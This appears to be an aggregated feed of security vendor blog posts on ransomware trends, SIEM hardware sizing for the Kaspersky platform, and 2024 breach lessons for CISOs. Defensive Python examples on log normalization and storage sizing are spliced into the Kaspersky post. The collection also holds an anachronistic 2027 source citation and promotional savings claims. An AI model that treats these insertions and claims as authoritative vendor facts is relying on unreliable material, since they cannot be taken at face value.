By understanding the tactics and strategies employed by ransomware groups, businesses can better prepare for the challenges that lie ahead in 2025 and beyond.

Source:

https://cyble.com/knowledge-hub/ransomware-tactics-adopted-by-threat-actors-in-2024/

https://www.statista.com/topics/4136/ransomware/#topicOverview

Monthly Ransomware Threat Intelligence 2027.pdf

The post Top 10 Ransomware Trends Observed in 2024: A Look Ahead to 2025 appeared first on Cyble.

Blog – Cyble – Read More

Hardware for SIEM systems | Kaspersky official blog

At some point, the information security department of any large company inevitably begins to consider introducing a SIEM system — or replacing the existing one, and must therefore estimate the budget required for its deployment. But SIEM isn’t a lightweight product that can be deployed within existing infrastructure. Almost all solutions in this category require additional hardware, meaning that equipment must be purchased or rented.

So, for accurate budgeting, it’s necessary to take into account the expected hardware configuration. In this post, we discuss how SIEM hardware requirements change depending on the company’s profile and system’s architecture, and provide rough parameters to help estimate the preliminary cost of such equipment.

Evaluating the data flow

Essentially, a SIEM system collects event data from internal and external sources and identifies security threats by correlating this data. Therefore, before considering what hardware will be required, it's essential to assess the volume of information the system will process and store. To do this, first identify the critical risks to the infrastructure, then determine which data sources must be analyzed to detect and address threats related to those risks; those are the sources to focus on. Such an assessment is necessary not only to determine the required hardware, but also to estimate the cost of licensing. For example, the cost of licensing for our Kaspersky Unified Monitoring and Analysis Platform SIEM system depends directly on the number of events per second (EPS). Another important aspect is to check how the vendor counts events for licensing. In our case, we take the events per second after filtering and aggregation, using the average number of events over the past 24 hours rather than peak values, but not all vendors follow this approach.

The most common sources include endpoints (Windows events, Sysmon, PowerShell logs, and antivirus logs), network devices (firewalls, IDS/IPS, switches, access points), proxy servers (such as Squid and Cisco WSA), vulnerability scanners, databases, cloud systems (such as AWS CloudTrail or Office 365), and infrastructure management servers (domain controllers, DNS servers, and so on).

As a rule, to form preliminary expectations about the average event flow, the size of the organization can serve as a guide. However, the architectural particularities of specific IT infrastructure can make company size a less decisive parameter.

In general, for small and medium-sized organizations with just one office — or up to several offices with good communication channels among them and IT infrastructure located in a single data center — an average event flow of 5000–10 000 EPS can be expected. For large companies, making an estimate is more challenging: depending on the complexity of the infrastructure and the presence of branches, EPS can range from 50 000 to 200 000 EPS.

Architectural components of a SIEM system

A SIEM system generally consists of four main components: the management subsystem, event collection subsystem, correlation subsystem, and storage subsystem.

Core (management subsystem). You can think of this as the control center of the system. It allows managing the other components, and provides visualization tools for SOC analysts — enabling them to easily configure operational parameters, monitor the SIEM system’s state, and, most importantly, view, analyze, sort and search events, process alerts, and work with incidents. This control center needs to also support log viewing through widgets and dashboards, and enable quick data search and access.

The core is an essential component and can be installed as a single instance or as a cluster to provide a higher level of resilience.

Event collection subsystem. As the name suggests, this subsystem collects data from various sources and converts it into a unified format through parsing and normalization. To calculate the required capacity of this subsystem, one must consider both the event flow intensity and the log format in which events arrive from sources.

The server load depends on how the subsystem processes logs. For example, even for structured logs (Key Value, CSV, JSON, XML), you can use either regular expressions (requiring significantly more powerful hardware) or the vendor’s built-in parsers.

Correlation subsystem. This subsystem analyzes data collected from logs, identifies sequences described in correlation rule logic, and, if necessary, generates alerts, determines their threat levels, and minimizes false positives. It’s important to remember that the correlator’s load is also determined not only by the event flow but by the number of correlation rules and the methods used to describe detection logic as well.
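The two subsystems just described, collection (parse and normalize) and correlation (match a sequence described by a rule), are easiest to see side by side. The following Python is an added example, not code from the Kaspersky Unified Monitoring and Analysis Platform or from this article. It normalizes two constructed feeds into one schema: Windows Security logon events exported as JSON lines (4625 = failed logon, 4624 = successful logon) and a key=value feed from a hypothetical VPN appliance (the `action=auth_fail|auth_ok` fields are an assumption). Both formats are structured, so they are parsed with `json.loads` and a split rather than regular expressions, which is the cheaper path the text recommends. A single correlation rule then runs over the sorted events: at least `threshold` failures from one source IP within `window` seconds followed by a success. The log lines, IPs and user names are constructed sample data.

```python
"""Added example: normalize two log formats into one schema, then run a correlation rule."""
import json
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample input (not captured data): Windows Security events as JSON
# lines, and key=value lines from a hypothetical VPN appliance.
RAW_JSON = [
    '{"EventID":4625,"TimeCreated":"2024-11-05T10:00:01Z","IpAddress":"10.0.0.5","TargetUserName":"alice"}',
    '{"EventID":4625,"TimeCreated":"2024-11-05T10:00:05Z","IpAddress":"10.0.0.5","TargetUserName":"alice"}',
    '{"EventID":4624,"TimeCreated":"2024-11-05T10:00:20Z","IpAddress":"10.0.0.5","TargetUserName":"alice"}',
    '{"EventID":4625,"TimeCreated":"2024-11-05T09:58:00Z","IpAddress":"10.0.0.9","TargetUserName":"bob"}',
]
RAW_KV = [
    "time=2024-11-05T10:00:03Z action=auth_fail user=alice src=10.0.0.5",
    "time=2024-11-05T10:00:10Z action=auth_fail user=bob src=10.0.0.9",
    "time=2024-11-05T10:00:12Z action=auth_fail user=bob src=10.0.0.9",
    "time=2024-11-05T10:00:30Z action=auth_ok user=bob src=10.0.0.9",
]


def _ts(iso):
    """ISO-8601 'Z' timestamp -> epoch seconds (UTC)."""
    return datetime.fromisoformat(iso.replace("Z", "+00:00")).timestamp()


def parse_windows_json(line):
    """Windows Security JSON -> normalized event; non-logon events are filtered out."""
    rec = json.loads(line)
    outcome = {4624: "success", 4625: "failure"}.get(rec["EventID"])
    if outcome is None:
        return None  # dropped at the collector: filtering reduces EPS downstream
    return {"ts": _ts(rec["TimeCreated"]), "src": rec["IpAddress"],
            "user": rec["TargetUserName"], "outcome": outcome}


def parse_kv(line):
    """key=value line -> normalized event, using a split instead of a regex."""
    rec = dict(tok.split("=", 1) for tok in line.split())
    outcome = {"auth_ok": "success", "auth_fail": "failure"}.get(rec.get("action"))
    if outcome is None:
        return None
    return {"ts": _ts(rec["time"]), "src": rec["src"], "user": rec["user"], "outcome": outcome}


def normalize(json_lines, kv_lines):
    """Collector stage: parse both feeds into the common schema, ordered by time."""
    events = [e for e in map(parse_windows_json, json_lines) if e]
    events += [e for e in map(parse_kv, kv_lines) if e]
    return sorted(events, key=lambda e: e["ts"])


def correlate_bruteforce(events, threshold=3, window=60):
    """Correlator stage: alert when one source IP fails >= threshold times within
    `window` seconds and then succeeds. Failures older than the window are evicted,
    so a stale failure does not inflate the count."""
    recent = defaultdict(deque)  # src -> timestamps of failures still inside the window
    alerts = []
    for e in events:
        q = recent[e["src"]]
        while q and e["ts"] - q[0] > window:
            q.popleft()
        if e["outcome"] == "failure":
            q.append(e["ts"])
        elif len(q) >= threshold:
            alerts.append({"src": e["src"], "user": e["user"],
                           "failures": len(q), "ts": e["ts"]})
            q.clear()  # one alert per burst
    return alerts


if __name__ == "__main__":
    for a in correlate_bruteforce(normalize(RAW_JSON, RAW_KV)):
        print(f"ALERT brute force then success: src={a['src']} user={a['user']} failures={a['failures']}")
```

On this input the rule fires once, for 10.0.0.5 (three failures across both feeds, then a success); 10.0.0.9 has one failure outside the 60-second window and only two inside it, so it stays silent at the default threshold. The load point made in the text is visible here too: every extra rule adds another pass of state per event, and a rule written as a regex over raw lines instead of over normalized fields would cost far more than this dictionary lookup.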

Storage subsystem. A SIEM system must not only analyze but also store data for internal investigations, analytics, visualization and reporting, and in certain industries for regulatory compliance and retrospective alert analysis. Thus, another critical question at the SIEM system design stage is how long you want to store collected logs. From an analyst's perspective, the longer the data is stored, the better. However, a longer log retention period increases hardware requirements. A mature SIEM system provides the ability to strike a balance by setting different retention periods for different log types. For example, 30 days for NetFlow logs, 60 days for Windows informational events, 180 days for Windows authentication events, and so on. This allows data to be optimally allocated across available server resources.

It’s also important to understand what volume of data will be stored using hot storage (allowing quick access) and cold storage (suitable for long-term retention). The storage subsystem must offer high performance, scalability, cross-storage search capabilities (both hot and cold), and data viewing options. Additionally, the ability to back up stored data is essential.
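To turn the two budgeting questions raised above into numbers (how many EPS to license, and how much hot versus cold disk a per-log-type retention policy needs), here is an added Python worksheet. It is not Kaspersky's sizing tool and not part of the article. Each source gets a constructed 24-hour EPS profile, an assumed average size of a stored normalized event, an assumed fraction that survives collector filtering and aggregation, and a retention period; the plan licenses on the 24-hour average after filtering (the approach the text describes for this vendor) while also reporting the peak, and splits storage so the first `hot_days` of every log type sit on fast disks and the remainder on cold storage. All profiles, sizes and ratios are assumptions to be replaced with measurements from a pilot collector.

```python
"""Added example: SIEM sizing worksheet (licensable EPS, hot/cold storage by retention).

All source profiles, per-event sizes and filter ratios are constructed assumptions.
"""
from dataclasses import dataclass

SECONDS_PER_DAY = 86_400


@dataclass
class Source:
    name: str
    hourly_eps: list           # 24 constructed samples, one per hour of a typical day
    bytes_per_event: int       # assumed average size of a normalized, stored event
    retention_days: int        # how long this log type must remain searchable
    filter_ratio: float = 1.0  # fraction that survives collector filtering/aggregation


def average_eps(src):
    """24h mean after filtering: the licensing basis described in the text."""
    return sum(src.hourly_eps) / len(src.hourly_eps) * src.filter_ratio


def peak_eps(src):
    """Busiest hour after filtering: what collectors and correlators must keep up with."""
    return max(src.hourly_eps) * src.filter_ratio


def storage_bytes(eps, bytes_per_event, days):
    return eps * SECONDS_PER_DAY * days * bytes_per_event


def size_plan(sources, hot_days):
    """Total licensable EPS, summed peak EPS, and hot/cold bytes for a retention policy."""
    plan = {"avg_eps": 0.0, "peak_eps": 0.0, "hot_bytes": 0.0, "cold_bytes": 0.0}
    for src in sources:
        eps = average_eps(src)
        hot = min(src.retention_days, hot_days)  # first N days stay on fast disks
        plan["avg_eps"] += eps
        plan["peak_eps"] += peak_eps(src)        # assumes peaks coincide: an upper bound
        plan["hot_bytes"] += storage_bytes(eps, src.bytes_per_event, hot)
        plan["cold_bytes"] += storage_bytes(eps, src.bytes_per_event, src.retention_days - hot)
    return plan


# Constructed profiles: a 6h/12h/6h workday curve for endpoints, flat for network gear.
WORKDAY = [1000] * 6 + [5000] * 12 + [1000] * 6
SOURCES = [
    Source("windows-auth", WORKDAY, 500, 180),
    Source("windows-info", [2 * v for v in WORKDAY], 400, 60, filter_ratio=0.5),
    Source("netflow", [4000] * 24, 150, 30),
    Source("firewall", [2000] * 24, 300, 90),
]

if __name__ == "__main__":
    p = size_plan(SOURCES, hot_days=30)
    print(f"license on average: {p['avg_eps']:.0f} EPS (peak {p['peak_eps']:.0f} EPS)")
    print(f"hot storage: {p['hot_bytes'] / 1e12:.1f} TB, cold storage: {p['cold_bytes'] / 1e12:.1f} TB")
```

With these assumptions the fleet licenses at 12 000 EPS although its summed peak is 16 000 EPS, and 30 days of hot retention needs about 10.1 TB while the long tail of the 180-day authentication logs pushes another 25.7 TB onto cold disks. The number that matters most is `bytes_per_event`: measure it from a pilot collector on your own normalized data, or back it out of the vendor's published sizing figures, before trusting the totals.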

Architectural features of Kaspersky SIEM

So, we've laid out the ideal requirements for a SIEM system. It probably won't surprise you that our Kaspersky Unified Monitoring and Analysis Platform meets these requirements. With its built-in capability to scale for data flows reaching hundreds of thousands of EPS within a single instance, our SIEM system isn't afraid of high loads. Importantly, unlike many alternative systems, it doesn't need to be split into multiple instances with correlation results reconciled afterwards.

The event collection subsystem of the Kaspersky Unified Monitoring and Analysis Platform system is equipped with a rich set of parsers optimized for processing logs in each format. Additionally, the multi-threading capabilities of Go mean the event flow can be processed using all available server resources.

The data storage subsystem used in our SIEM system consists of servers that store data, and servers with the clickhouse-keeper role, which manage the cluster (these servers don’t store data themselves but facilitate coordination among instances). For data flows of 20 000 EPS with a relatively low number of search queries, these services can operate on the same servers that store the data. For higher data flows, it’s recommended to separate these services. For instance, they can be deployed on virtual machines (a minimum of one is required, though three are recommended).

The Kaspersky Unified Monitoring and Analysis Platform storage system is flexible, allowing event flows to be distributed across multiple spaces and specifying the storage depth for each space. For example, inexpensive disks can be used to create cold storage (where searches are still possible, just slower). This cold storage can house data that is unlikely to require analysis but must be stored due to regulatory requirements. Such information can be moved to cold storage literally the day after it's collected.

Thus, the data storage approach implemented in our SIEM system enables long-term data retention without exceeding the budget on expensive equipment, thanks to hot and cold storage capabilities.

SIEM architecture deployment using our SIEM as an example

The Kaspersky Unified Monitoring and Analysis Platform supports multiple deployment options, so it’s important first to determine your organization’s architecture needs. This can be done based on the estimated EPS flow, and the particularities of your company. For simplicity, let’s assume the required data retention period is 30 days.

Data flow: 5000–10 000 EPS

For a small organization, the SIEM system can be deployed on a single server. For example, our SIEM system supports the All-in-One installation option. In this case, the required server configuration is 16 CPUs, 32GB of RAM, and 2.5TB of disk space.

Data flow: 30 000 EPS

For larger organizations, separate servers are needed for each SIEM component. Dedicating a server exclusively for storage ensures that search queries don’t affect the processing of events by the collector and correlator. However, the collector and correlator services can still be deployed together (or separately, if desired). An approximate equipment configuration for this scenario is as follows:

  • Core: 10 CPUs, 24GB of RAM, 0.5TB of disk space
  • Collector: 8 CPUs, 16GB of RAM, 0.5TB of disk space
  • Correlator: 8 CPUs, 32GB of RAM, 0.5TB of disk space
  • Storage: 24 CPUs, 64GB of RAM, 14TB of disk space

Data flow: 50 000–200 000 EPS

For large enterprises, additional factors must be considered when defining the architecture. These include ensuring resilience (as the substantial data-flow increases the risk of failure) and the presence of company divisions (branches). In such cases, more servers may be required to install the SIEM system, as it’s preferable to distribute collector and correlator services across different servers for such high EPS flows.

Data flow: 200 000 EPS

As EPS flows grow and the infrastructure divides into separate independent units, the amount of equipment required increases accordingly. Additional servers will be needed for collectors, storage, correlators, and keepers. Moreover, in large organizations, data availability requirements may take precedence. In this case, the Kaspersky Unified Monitoring and Analysis Platform storage cluster divides all collected events into shards. Each shard consists of one or more data replicas. And each shard replica is a cluster node, meaning a separate server. To ensure resilience and performance, we recommend deploying the cluster with two replicas per shard. For processing such large EPS volumes, three collector servers may be required, installed in the offices with the highest event flows.

Kaspersky SIEM in holding companies

In large enterprises, the cost of implementing a SIEM system increases not only with the volume of data, but also depending on the usage profile. For example, in some cases (such as MSP and MSSP environments, as well as large holding companies with multiple subsidiaries or branches), multi-tenancy is required. This means the company needs to maintain multiple "mini-SIEMs", which operate independently. Our solution enables this through a single installation at the head office, without the need to install separate systems at each branch or tenant. This significantly reduces equipment costs.

SIEM scheme

Let’s imagine either (i) a holding company, (ii) a vertically-integrated enterprise, or (iii) a geographically-distributed corporation with either various independent security teams or a need to isolate data access among branches. The Kaspersky Unified Monitoring and Analysis Platform tenant model allows for segregated access to all resources, events, and third-party integration settings. This means one installation functions as multiple separate SIEM systems. In this case, while each tenant can develop its own content (correlation rules), there’s also the option of distributing a unified set of resources across all divisions. In other words, each division can have its own collectors, correlators, and rules, but the HQ security team can also assign standardized bundles of security content for everyone — ensuring consistent protection across the organization.

SIEM in holding

Thus, using the Kaspersky Unified Monitoring and Analysis Platform ensures the necessary performance with relatively modest computing resources. In some cases, savings on hardware can reach up to 50%.

For a more accurate understanding of the required resources and implementation costs, we recommend talking with our specialists or integration partners. We (or our partners) can also provide premium support, assist in developing additional integrations (including using API capabilities for connected products), and oversee the deployment of a turnkey solution covering system design, equipment estimation, configuration optimization, and much more. Learn more about our SIEM system, the Kaspersky Unified Monitoring and Analysis Platform, on the official product page.

Kaspersky official blog – Read More

Top 5 Lessons for CISOs and Cybersecurity Professionals from 2024


The year 2024 has been a rollercoaster for cybersecurity professionals worldwide. From ransomware attacks paralyzing critical industries to insider threats causing massive data breaches, the challenges for Chief Information Security Officers (CISOs) and cybersecurity teams have been relentless. These cyberattacks and data breaches highlight the importance of adapting strategies and learning from past events to secure organizations better as cyber threats evolve. 

Here are the top five lessons that CISOs and cybersecurity professionals should carry into 2025.

Lessons from 2024 that CISOs Must Carry Forward 

1. Human Error Remains the Biggest Cyber Vulnerability 

A staggering 84% of CISOs in countries like Saudi Arabia, Canada, France, and South Korea identified human error as their organization’s greatest cybersecurity weakness in 2024. This vulnerability extends to phishing attacks, misconfigurations, poor credential management, and insider threats. 

Case in Point: The Star Health Insurance Breach 

In August 2024, India’s largest health insurer, Star Health, suffered a data breach exposing millions of customer medical reports and personal details. The threat actor “xenZen” accused the company’s CISO of insider collusion, sharing a screenshot alleging that credentials were leaked via email. 

This Star Health Insurance data breach highlights two key lessons: 

  • Cybersecurity training needs to go beyond awareness: Employees, especially those handling sensitive data, must undergo regular, scenario-based training. 

  • Strengthen insider threat detection: Advanced monitoring tools and strict access controls can help detect suspicious activities before they escalate into full-blown breaches. 

2. Multi-Factor Authentication (MFA) Is Non-Negotiable 

In 2024, weak or absent MFA emerged as a common denominator in several high-profile breaches. Attackers exploited credential weaknesses to gain access to sensitive systems, causing significant damage. 

Case in Point: The Snowflake Breach 

The U.S.-based cloud data platform Snowflake was at the center of a breach in which compromised customer credentials, obtained through infostealer malware, were used to access sensitive data held in customer accounts. Because MFA was not enforced on those accounts, attackers were able to compromise the data of high-profile clients like Ticketmaster and LendingTree.

Lesson Learned: 

  • Implement MFA universally: Every account, internal or external, must have MFA enabled. A single weak link can jeopardize the entire ecosystem. 

  • Enforce credential hygiene: Regularly rotate credentials, monitor for leaked credentials on the dark web, and implement strong password policies. 

3. Ransomware Is Evolving—So Must Your Defenses 

Ransomware attacks continued to dominate headlines in 2024, with 41% of CISOs worldwide naming it a top cybersecurity risk. These attacks increasingly targeted critical infrastructure and essential service providers, making their impact devastating. 

Case in Point: The CDK Global Ransomware Attack 

In June 2024, CDK Global, a software provider for car dealerships, was hit by a ransomware attack that disrupted operations for over 15,000 dealerships. Major companies like Asbury Automotive and Lithia Motors had to revert to manual processes, resulting in financial losses and customer dissatisfaction. 

Lesson Learned: 

  • Strengthen endpoint protection: Implement advanced threat detection tools to identify and stop ransomware before it spreads. 

  • Create vigorous incident response plans: Include regular backups, tabletop exercises, and quick recovery protocols to minimize downtime. 

4. The Supply Chain Is a Critical Weak Link

Cybercriminals increasingly exploited vulnerabilities in supply chains, targeting third-party vendors to gain access to larger organizations. 

Case in Point: The Dell Data Breach 

In 2024, Dell confirmed a data breach exposing 49 million customer purchase records. While financial data remained secure, the stolen information was sufficient to launch phishing and smishing attacks. 

Case in Point: The Ascension Health Cyberattack 

A massive cyberattack on Ascension Health disrupted clinical operations, forcing the nonprofit health system to disconnect from some business partners. The attack led to an additional operating loss of $1.8 billion for the fiscal year. 

Lesson Learned: 

  • Conduct thorough vendor risk assessments: Before partnering with third-party vendors, evaluate their cybersecurity posture. 

  • Mandate compliance with security standards: Require vendors to adopt strong security practices like SOC 2 compliance and regular penetration testing. 

5. Customer Trust Is Harder to Rebuild After a Breach

In 2024, cyberattacks had far-reaching consequences beyond financial losses. According to statistics, 47% of respondents indicated that attracting new customers became significantly harder after a data breach. 

Case in Point: Change Healthcare (CHC) Ransomware Attack 

In February 2024, Change Healthcare fell victim to a ransomware attack linked to the BlackCat group. With sensitive health data of over 110 million individuals exposed, the incident eroded trust among customers. Despite offering credit monitoring services, the reputational damage proved difficult to mitigate. 

Lesson Learned: 

  • Be transparent and proactive: When breaches occur, communicate quickly, outline steps taken to mitigate the impact, and offer affected customers tangible support. 

  • Invest in brand reputation management: Build a strong security narrative and a culture of trust through certifications, audits, and visible cybersecurity initiatives. 

Actionable Takeaways for CISOs and Cybersecurity Professionals 

As the threat landscape becomes increasingly complex, organizations must adopt a multi-faceted approach to cybersecurity. Incorporating advanced tools and platforms can significantly enhance CISOs' ability to address modern threats and safeguard their enterprise.

Tools like Cyble Vision provide a comprehensive suite of capabilities that can empower organizations to identify, monitor, and mitigate threats across their digital footprint. For example: 

  • Attack Surface Management: Proactively identify and mitigate vulnerabilities by gaining a complete view of your organization’s external attack surface. 

  • Brand Intelligence: Protect against online brand abuse, including phishing and fraudulent domains, to safeguard customer trust and your organization’s reputation. 

  • Dark Web Monitoring: Stay ahead of cybercriminals with continuous monitoring of dark web activities, uncovering leaked credentials, sensitive data, and emerging threats. 

  • Cyber Threat Intelligence: Leverage AI-driven insights and continuous monitoring to detect and counteract evolving cyber threats in real time. 

  • Takedown and Disruption Services: Address malicious campaigns effectively by removing fraudulent websites and disrupting attack operations. 

  • Third-Party Risk Management: Identify and mitigate risks from vendors and external collaborators, ensuring security in your business partnerships. 

  • Vulnerability Management: Use advanced scanning and remediation tools to address vulnerabilities before they are exploited. 

These capabilities, combined with features like digital forensics, incident response, and executive monitoring, enable CISOs to adopt a proactive, intelligence-led approach to managing cybersecurity challenges. Solutions like Cyble’s provide the visibility and tools needed to stay ahead of adversaries, reduce exposure, and protect critical assets. 

By integrating such advanced tools into their cybersecurity frameworks, CISOs can not only address existing risks but also build resilience against future threats, ensuring their organization’s digital security is always one step ahead. 

To Sum Up 

The lessons from 2024’s high-profile cyberattacks highlight the need for a shift from reactive to proactive cybersecurity strategies. With 38% of CISOs identifying malware as a top risk and 29% pointing to email fraud and DDoS attacks, it’s clear that the threat landscape continues to evolve at an alarming pace.  

However, as businesses navigate these challenges, the focus must remain on fortifying human and technological defenses, building cyber resilience, and fostering transparency in post-breach communication. 

As organizations worldwide grapple with the dual pressures of digital transformation and escalating cyber threats, the stakes have never been higher. Learning from the mistakes and successes of 2024 will empower CISOs and cybersecurity professionals to build stronger, more adaptive defenses—ensuring not just survival but success in the face of cyber adversity. 

The post Top 5 Lessons for CISOs and Cybersecurity Professionals from 2024 appeared first on Cyble.
